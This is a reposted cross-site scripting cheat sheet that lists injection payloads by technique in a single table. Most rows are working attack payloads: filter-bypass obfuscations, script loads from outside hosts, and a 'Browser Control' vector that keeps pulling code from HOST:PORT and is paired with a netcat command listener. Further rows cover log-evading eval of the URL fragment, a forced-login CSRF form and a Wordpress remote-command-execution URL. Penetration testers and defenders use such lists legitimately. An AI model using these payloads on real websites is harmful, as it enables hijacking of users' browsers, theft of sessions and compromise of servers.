XSS Payload
From a certain expert's site: http://www.cnblogs.com/b1gstar/p/5783848.html
Basic and advanced exploits for XSS proofs and attacks.
Work in progress, bookmark it.
Technique | Vector/Payload *
---|---
HTML Context Tag Injection | `<svg onload=alert(1)>` <br> `"><svg onload=alert(1)//`
HTML Context Inline Injection | `"onmouseover=alert(1)//` <br> `"autofocus/onfocus=alert(1)//`
Javascript Context Code Injection | `'-alert(1)-'` <br> `'-alert(1)//`
Javascript Context Code Injection (escaping the escape) | `\'-alert(1)//`
Javascript Context Tag Injection | `</script><svg onload=alert(1)>`
PHP_SELF Injection | `http://DOMAIN/PAGE.php/"><svg onload=alert(1)>`
Without Parenthesis | `` <svg onload=alert`1`> `` <br> `<svg onload=alert&lpar;1&rpar;>` <br> `<svg onload=alert&#40;1&#41;>` <br> `<svg onload=alert&#x28;1&#x29;>`
Filter Bypass | `(alert)(1)` <br> `a=alert,a(1)` <br> `[1].find(alert)` <br> `top["al"+"ert"](1)` <br> `top[/al/.source+/ert/.source](1)` <br> `al\u0065rt(1)` <br> `top['al\145rt'](1)` <br> `top['al\x65rt'](1)` <br> `top[8680439..toString(30)](1)`
Body Tag | `<body onload=alert(1)>` <br> `<body onpageshow=alert(1)>` <br> `<body onfocus=alert(1)>` <br> `<body onhashchange=alert(1)><a href=#x>click this!#x` <br> `<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x` <br> `<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><x id=x>#x` <br> `<body onresize=alert(1)>press F12!` <br> `<body onhelp=alert(1)>press F1! (MSIE)`
Miscellaneous Vectors | `<marquee onstart=alert(1)>` <br> `<marquee loop=1 width=0 onfinish=alert(1)>` <br> `<audio src onloadstart=alert(1)>` <br> `<video onloadstart=alert(1)><source>` <br> `<input autofocus onblur=alert(1)>` <br> `<keygen autofocus onfocus=alert(1)>` <br> `<form onsubmit=alert(1)><input type=submit>` <br> `<select onchange=alert(1)><option>1<option>2` <br> `<menu id=x contextmenu=x onshow=alert(1)>right click me!`
Agnostic Event Handlers | `<x contenteditable onblur=alert(1)>lose focus!` <br> `<x onclick=alert(1)>click this!` <br> `<x oncopy=alert(1)>copy this!` <br> `<x oncontextmenu=alert(1)>right click this!` <br> `<x oncut=alert(1)>copy this!` <br> `<x ondblclick=alert(1)>double click this!` <br> `<x ondrag=alert(1)>drag this!` <br> `<x contenteditable onfocus=alert(1)>focus this!` <br> `<x contenteditable oninput=alert(1)>input here!` <br> `<x contenteditable onkeydown=alert(1)>press any key!` <br> `<x contenteditable onkeypress=alert(1)>press any key!` <br> `<x contenteditable onkeyup=alert(1)>press any key!` <br> `<x onmousedown=alert(1)>click this!` <br> `<x onmousemove=alert(1)>hover this!` <br> `<x onmouseout=alert(1)>hover this!` <br> `<x onmouseover=alert(1)>hover this!` <br> `<x onmouseup=alert(1)>click this!` <br> `<x contenteditable onpaste=alert(1)>paste here!`
Code Reuse Inline Script | `<script>alert(1)//` <br> `<script>alert(1)<!--`
Code Reuse Regular Script | `<script src=//brutelogic.com.br/1.js>` <br> `<script src=//3334957647/1>`
Filter Bypass |
Generic Source Breaking | `<x onxxx=alert(1) 1='`
Browser Control | `<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>` <br> `$ while :; do printf "j$ "; read c; echo $c \| nc -lp PORT >/dev/null; done`
Multi Reflection |
Without Event Handlers | `<script>alert(1)</script>` <br> `<script src=javascript:alert(1)>` <br> `<iframe src=javascript:alert(1)>` <br> `<embed src=javascript:alert(1)>` <br> `<a href=javascript:alert(1)>click` <br> `<math><brute href=javascript:alert(1)>click` <br> `<form action=javascript:alert(1)><input type=submit>` <br> `<isindex action=javascript:alert(1) type=submit value=click>` <br> `<form><button formaction=javascript:alert(1)>click` <br> `<form><input formaction=javascript:alert(1) type=submit value=click>` <br> `<form><input formaction=javascript:alert(1) type=image value=click>` <br> `<form><input formaction=javascript:alert(1) type=image src=SOURCE>` <br> `<isindex formaction=javascript:alert(1) type=submit value=click>` <br> `<object data=javascript:alert(1)>` <br> `<iframe srcdoc=<svg/onload=alert(1)>>` <br> `<svg><script xlink:href=data:,alert(1) />` <br> `<math><brute xlink:href=javascript:alert(1)>click` <br> `<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>`
Mobile Only |
Generic Self to Regular XSS | `<iframe src=LOGOUT_URL onload=forms[0].submit()> </iframe><form method=post action=LOGIN_URL> <input name=USERNAME_PARAMETER_NAME value=USERNAME> <input name=PASSWORD_PARAMETER_NAME value=PASSWORD>`
File Upload | Injection in Filename: `"><img src=1 onerror=alert(1)>.gif` <br> Injection in Metadata <br> Injection with SVG File <br> Injection with GIF File as Source of Script (CSP Bypass)
Google Chrome | `<script src="data:,alert(1)//` <br> `"><script src=data:,alert(1)//` <br> `<script src="//brutelogic.com.br/1.js#` <br> `<link rel=import href="data:text/html,<script>alert(1)</script>`
PHP File for XHR Remote Call | `<?php header("Access-Control-Allow-Origin: *"); ?> <img src=1 onerror=alert(1)>`
Server Log Avoidance | `<svg onload=eval(URL.slice(-8))>#alert(1)` <br> `<svg onload=eval(location.hash.slice(1))>#alert(1)` <br> `<svg onload=innerHTML=location.hash>#<script>alert(1)</script>`
Shortest PoC | `<base href=//0>` <br> `$ while :; do echo "alert(1)" \| nc -lp80; done`
Portable Wordpress RCE | `<script/src="data:,eval(atob(location.hash.slice(1)))//#` followed by a base64-encoded payload in the fragment (blob not reproduced) <br> `http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD`

\* In URLs: `&` => `%26`, `#` => `%23`, `+` => `%2B`
NOTICE: A special version of this cheat sheet (with private stuff) is available to @brutalsecrets followers here (check pass on timeline).
#hack2learn
Reposted from: https://www.cnblogs.com/nuomin/p/7063750.html